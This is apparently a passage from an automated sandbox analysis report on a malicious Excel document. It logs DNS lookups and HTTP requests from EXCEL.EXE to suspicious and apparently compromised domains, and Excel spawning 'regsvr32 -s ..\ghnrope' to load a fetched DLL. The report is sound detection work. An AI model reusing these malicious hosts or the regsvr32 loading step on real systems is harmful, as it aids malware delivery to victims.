                    Apr 9, 2021 16:44:03.699882030 CEST44349169162.251.80.27192.168.2.22

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Apr 9, 2021 16:43:59.885570049 CEST5219753192.168.2.228.8.8.8
                    Apr 9, 2021 16:44:00.285662889 CEST53521978.8.8.8192.168.2.22
                    Apr 9, 2021 16:44:00.737401962 CEST5309953192.168.2.228.8.8.8
                    Apr 9, 2021 16:44:00.751334906 CEST53530998.8.8.8192.168.2.22
                    Apr 9, 2021 16:44:01.177189112 CEST5283853192.168.2.228.8.8.8
                    Apr 9, 2021 16:44:01.344763041 CEST53528388.8.8.8192.168.2.22
                    Apr 9, 2021 16:44:02.226948023 CEST6120053192.168.2.228.8.8.8
                    Apr 9, 2021 16:44:02.240351915 CEST53612008.8.8.8192.168.2.22
                    Apr 9, 2021 16:44:02.250766993 CEST4954853192.168.2.228.8.8.8
                    Apr 9, 2021 16:44:02.262605906 CEST53495488.8.8.8192.168.2.22
                    Apr 9, 2021 16:44:02.770608902 CEST5562753192.168.2.228.8.8.8
                    Apr 9, 2021 16:44:02.796124935 CEST53556278.8.8.8192.168.2.22
                    Apr 9, 2021 16:44:02.807697058 CEST5600953192.168.2.228.8.8.8
                    Apr 9, 2021 16:44:02.826205969 CEST53560098.8.8.8192.168.2.22
                    Apr 9, 2021 16:44:03.749099016 CEST6186553192.168.2.228.8.8.8
                    Apr 9, 2021 16:44:03.762427092 CEST53618658.8.8.8192.168.2.22
                    Apr 9, 2021 16:44:04.876151085 CEST5517153192.168.2.228.8.8.8
                    Apr 9, 2021 16:44:04.896198034 CEST53551718.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Apr 9, 2021 16:43:59.885570049 CEST192.168.2.228.8.8.80x2c09Standard query (0)runolfsson-jayde07s.ru.comA (IP address)IN (0x0001)
                    Apr 9, 2021 16:44:00.737401962 CEST192.168.2.228.8.8.80xd8c3Standard query (0)cremin-ian07u.ru.comA (IP address)IN (0x0001)
                    Apr 9, 2021 16:44:01.177189112 CEST192.168.2.228.8.8.80x26d4Standard query (0)shalombaptistchapel.comA (IP address)IN (0x0001)
                    Apr 9, 2021 16:44:03.749099016 CEST192.168.2.228.8.8.80x5ae3Standard query (0)cesiroinsurance.comA (IP address)IN (0x0001)
                    Apr 9, 2021 16:44:04.876151085 CEST192.168.2.228.8.8.80x6a10Standard query (0)innermetransformation.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Apr 9, 2021 16:44:00.285662889 CEST8.8.8.8192.168.2.220x2c09No error (0)runolfsson-jayde07s.ru.com8.211.4.209A (IP address)IN (0x0001)
                    Apr 9, 2021 16:44:00.751334906 CEST8.8.8.8192.168.2.220xd8c3No error (0)cremin-ian07u.ru.com8.211.4.209A (IP address)IN (0x0001)
                    Apr 9, 2021 16:44:01.344763041 CEST8.8.8.8192.168.2.220x26d4No error (0)shalombaptistchapel.com162.251.80.27A (IP address)IN (0x0001)
                    Apr 9, 2021 16:44:03.762427092 CEST8.8.8.8192.168.2.220x5ae3No error (0)cesiroinsurance.com67.222.38.97A (IP address)IN (0x0001)
                    Apr 9, 2021 16:44:04.896198034 CEST8.8.8.8192.168.2.220x6a10No error (0)innermetransformation.com173.201.252.173A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • runolfsson-jayde07s.ru.com
                    • cremin-ian07u.ru.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.22491678.211.4.20980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampkBytes transferredDirectionData
                    Apr 9, 2021 16:44:00.327064037 CEST0OUTGET /ind.html HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: runolfsson-jayde07s.ru.com
                    Connection: Keep-Alive
                    Apr 9, 2021 16:44:00.718256950 CEST1INHTTP/1.1 503 Service Unavailable
                    Date: Fri, 09 Apr 2021 14:44:00 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Content-Length: 76
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
                    Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.22491688.211.4.20980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampkBytes transferredDirectionData
                    Apr 9, 2021 16:44:00.772741079 CEST2OUTGET /ind.html HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: cremin-ian07u.ru.com
                    Connection: Keep-Alive
                    Apr 9, 2021 16:44:01.157820940 CEST2INHTTP/1.1 503 Service Unavailable
                    Date: Fri, 09 Apr 2021 14:44:00 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Content-Length: 76
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
                    Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.


                    HTTPS Packets

                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                    Apr 9, 2021 16:44:01.685137987 CEST162.251.80.27443192.168.2.2249169CN=autodiscover.shalombaptistchapel.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Feb 13 12:43:03 CET 2021 Wed Oct 07 21:21:40 CEST 2020Fri May 14 13:43:03 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                    CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                    Apr 9, 2021 16:44:04.095480919 CEST67.222.38.97443192.168.2.2249172CN=www.cesiroinsurance.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Feb 15 21:11:45 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sun May 16 22:11:45 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                    CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                    Apr 9, 2021 16:44:05.263653040 CEST173.201.252.173443192.168.2.2249173CN=innermetransformation.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 02 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Tue Jun 01 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                    CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                    CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                    Code Manipulations

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:16:43:35
                    Start date:09/04/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                    Imagebase:0x13ff90000
                    File size:27641504 bytes
                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:16:43:44
                    Start date:09/04/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:regsvr32 -s ..\ghnrope
                    Imagebase:0xffb60000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:16:43:44
                    Start date:09/04/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:regsvr32 -s
                    Imagebase:0xffb60000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:16:43:44
                    Start date:09/04/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:regsvr32 -s
                    Imagebase:0xffb60000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:16:43:44
                    Start date:09/04/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:regsvr32 -s
                    Imagebase:0xffb60000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:16:43:45
                    Start date:09/04/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:regsvr32 -s
                    Imagebase:0xffb60000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Reset < >